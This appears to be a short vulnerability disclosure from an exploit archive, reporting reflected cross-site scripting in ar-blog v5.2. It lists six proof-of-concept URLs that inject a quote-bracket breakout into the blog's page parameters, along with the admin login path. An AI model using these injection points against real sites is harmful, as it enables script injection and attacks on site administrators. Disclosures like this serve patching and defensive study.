|
Multiple Xss exploits in ar-blog v 5.2=0D
=0D
forum type : ar-blog v 5.2=0D
bug found by : black-code=0D
team : site-down=0D
type : Xss=0D
=0D
black-code:=0D
=0D
http://www.xxx.com/path/index.php?page=gb&count=next='>=0D
=0D
http://www.xxx.com/path/index.php?page=gb&count='>=0D
=0D
http://www.xxx.com/path/index.php?page=showtopis&month=mo&year=Year_the_news='>=0D
=0D
http://www.xxx.com/path/index.php?page=showtopis&month=mo&year='>=0D
=0D
http://www.xxx.com/path/index.php?page=showtopis&month=mo='>=0D
=0D
http://www.xxx.com/path/index.php?page=showtopis&month='>=0D
=0D
=0D
=0D
path to admin login:=0D
=0D
http://www.xxx.com/pth/admin=0D
=0D
All my respect to my friend sweet-devil , lezr.com , g123g.net ..=0D
=0D
done .. peace